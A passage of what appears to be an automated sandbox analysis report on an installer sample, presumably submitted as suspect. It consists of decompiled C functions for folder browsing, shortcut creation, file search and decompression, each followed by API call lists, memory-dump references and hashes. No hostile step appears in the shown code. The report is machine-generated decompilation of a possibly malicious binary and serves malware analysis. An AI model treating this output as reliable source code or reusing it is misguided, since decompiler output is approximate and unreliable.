					_push(1);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DC3(_a4);
					E00403DF8(_t144);
					_t128 = E00405CEE("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E2A(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}





































                                                                          0x00404207
                                                                          0x0040420e
                                                                          0x0040421a
                                                                          0x00404228
                                                                          0x00404230
                                                                          0x00404234
                                                                          0x0040423a
                                                                          0x0040423a
                                                                          0x00404246
                                                                          0x004042c0
                                                                          0x004042c7
                                                                          0x00404393
                                                                          0x0040439a
                                                                          0x004043a9
                                                                          0x004043a9
                                                                          0x004043ad
                                                                          0x004043b3
                                                                          0x004043b6
                                                                          0x004043c3
                                                                          0x004043c5
                                                                          0x004043c5
                                                                          0x004043d3
                                                                          0x004043d9
                                                                          0x004043e0
                                                                          0x004043e2
                                                                          0x004043e2
                                                                          0x004043ef
                                                                          0x004043fb
                                                                          0x0040441f
                                                                          0x00404430
                                                                          0x00404436
                                                                          0x00404438
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040443e
                                                                          0x0040443e
                                                                          0x0040444c
                                                                          0x00000000
                                                                          0x004043fd
                                                                          0x00404400
                                                                          0x00404404
                                                                          0x00404408
                                                                          0x00404409
                                                                          0x0040440e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404416
                                                                          0x0040444e
                                                                          0x0040444e
                                                                          0x00404455
                                                                          0x0040445e
                                                                          0x00404460
                                                                          0x00404460
                                                                          0x00404467
                                                                          0x00404472
                                                                          0x0040447c
                                                                          0x00404484
                                                                          0x0040449a
                                                                          0x00404486
                                                                          0x0040448a
                                                                          0x0040448a
                                                                          0x00404484
                                                                          0x0040449f
                                                                          0x004044a4
                                                                          0x004044a9
                                                                          0x004044b2
                                                                          0x004044b2
                                                                          0x004044bb
                                                                          0x004044bd
                                                                          0x004044bd
                                                                          0x004044c9
                                                                          0x004044d1
                                                                          0x004044db
                                                                          0x004044db
                                                                          0x004044e0
                                                                          0x00000000
                                                                          0x004044e0
                                                                          0x004043fb
                                                                          0x0040439c
                                                                          0x004043a3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004043a3
                                                                          0x004042cd
                                                                          0x004042d3
                                                                          0x004042ed
                                                                          0x004042f2
                                                                          0x004042fc
                                                                          0x00404303
                                                                          0x00404308
                                                                          0x00404312
                                                                          0x00404315
                                                                          0x00404318
                                                                          0x0040431f
                                                                          0x00404327
                                                                          0x0040432a
                                                                          0x0040432e
                                                                          0x00404335
                                                                          0x0040433d
                                                                          0x0040438c
                                                                          0x0040433f
                                                                          0x00404340
                                                                          0x00404346
                                                                          0x00404350
                                                                          0x00404358
                                                                          0x0040435a
                                                                          0x0040435b
                                                                          0x0040435d
                                                                          0x00404363
                                                                          0x00404371
                                                                          0x00404375
                                                                          0x00404375
                                                                          0x00404371
                                                                          0x0040437a
                                                                          0x00404385
                                                                          0x00404385
                                                                          0x0040433d
                                                                          0x00000000
                                                                          0x004042f2
                                                                          0x004042e0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004042e6
                                                                          0x00000000
                                                                          0x00404248
                                                                          0x00404253
                                                                          0x0040425c
                                                                          0x00404269
                                                                          0x00404269
                                                                          0x00404273
                                                                          0x00404278
                                                                          0x00404281
                                                                          0x00404284
                                                                          0x00404289
                                                                          0x00404291
                                                                          0x00404294
                                                                          0x00404299
                                                                          0x0040429f
                                                                          0x004042ae
                                                                          0x004042b5
                                                                          0x004044e6
                                                                          0x004044f8
                                                                          0x004044f8
                                                                          0x004042be
                                                                          0x00000000
                                                                          0x004042be

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 0040424C
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404278
                                                                          • SHBrowseForFolderA.SHELL32(?,00429C78,?), ref: 00404335
                                                                          • lstrcmpiA.KERNEL32(Hyvkfcorf,0042A8A0,00000000,?,?,00000000), ref: 00404369
                                                                          • lstrcatA.KERNEL32(?,Hyvkfcorf), ref: 00404375
                                                                          • SetDlgItemTextA.USER32 ref: 00404385
                                                                            • Part of subcall function 004052BF: GetDlgItemTextA.USER32 ref: 004052D2
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                                            • Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                                          • GetDiskFreeSpaceA.KERNEL32(00429870,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,00429870,00429870,?,?,000003FB,?), ref: 00404430
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404446
                                                                          • SetDlgItemTextA.USER32 ref: 0040449A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                          • String ID: A$GetDiskFreeSpaceExA$Hyvkfcorf$KERNEL32.dll$SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 2007447535-3593348546
                                                                          • Opcode ID: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
                                                                          • Instruction ID: f206f0ffef5a04671e447d0e91c878c3daa73ba4eb39f4f1c2dae132269ab5a2
                                                                          • Opcode Fuzzy Hash: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
                                                                          • Instruction Fuzzy Hash: 508180B1A00218ABDB11EFA2CD45B9F7AB8EF44354F10417BFA04B62D1D77C9A418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405554(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407430, _t75, 1, 0x407420, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407440, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409440 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409440, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409440, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                          0x004020af
                                                                          0x004020b9
                                                                          0x004020c2
                                                                          0x004020cc
                                                                          0x004020d5
                                                                          0x004020df
                                                                          0x004020e3
                                                                          0x004020e3
                                                                          0x004020e8
                                                                          0x004020f9
                                                                          0x00402101
                                                                          0x004021df
                                                                          0x004021df
                                                                          0x004021e6
                                                                          0x00402107
                                                                          0x00402107
                                                                          0x00402118
                                                                          0x0040211c
                                                                          0x00402122
                                                                          0x0040212c
                                                                          0x0040212e
                                                                          0x00402139
                                                                          0x0040213c
                                                                          0x00402149
                                                                          0x0040214b
                                                                          0x0040214d
                                                                          0x00402154
                                                                          0x00402157
                                                                          0x00402157
                                                                          0x0040215a
                                                                          0x00402164
                                                                          0x0040216c
                                                                          0x00402171
                                                                          0x0040217d
                                                                          0x0040217d
                                                                          0x00402180
                                                                          0x00402189
                                                                          0x0040218c
                                                                          0x00402195
                                                                          0x0040219a
                                                                          0x004021ac
                                                                          0x004021b5
                                                                          0x004021bb
                                                                          0x004021c7
                                                                          0x004021c7
                                                                          0x004021c9
                                                                          0x004021cf
                                                                          0x004021cf
                                                                          0x004021d2
                                                                          0x004021d8
                                                                          0x004021dd
                                                                          0x004021f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004021dd
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00407430,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409440,00000400,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 123533781-501415292
                                                                          • Opcode ID: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
                                                                          • Instruction ID: 4df27e177d60a4ea751ebd20e87b2fb7c9e865850ddb53f1d7743bd9643c1b3c
                                                                          • Opcode Fuzzy Hash: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
                                                                          • Instruction Fuzzy Hash: 5A415D75A00215AFCB00DFA4CD88E9E7BB6FF48319B20416AF905EB2E1CA759D41CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 39%
                                                                          			E004026BC(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405939(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059DB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                          0x004026d4
                                                                          0x004026e8
                                                                          0x004026f3
                                                                          0x004026f4
                                                                          0x00402855
                                                                          0x004026d6
                                                                          0x004026d6
                                                                          0x004026d8
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
                                                                          • Instruction ID: 9601d7ef4499486e177952c5a453970aa3bd803740f53fde15c253ab4d2be1f5
                                                                          • Opcode Fuzzy Hash: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
                                                                          • Instruction Fuzzy Hash: D5F0A0B2608110DFDB01EBA49E49AEEB778DF21324F60017BE141B20C1D6B84A499B3A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004060D9, Relevance: .3, Instructions: 334COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E004060D9(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406848( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407314; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407314; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004068B0( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406808))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
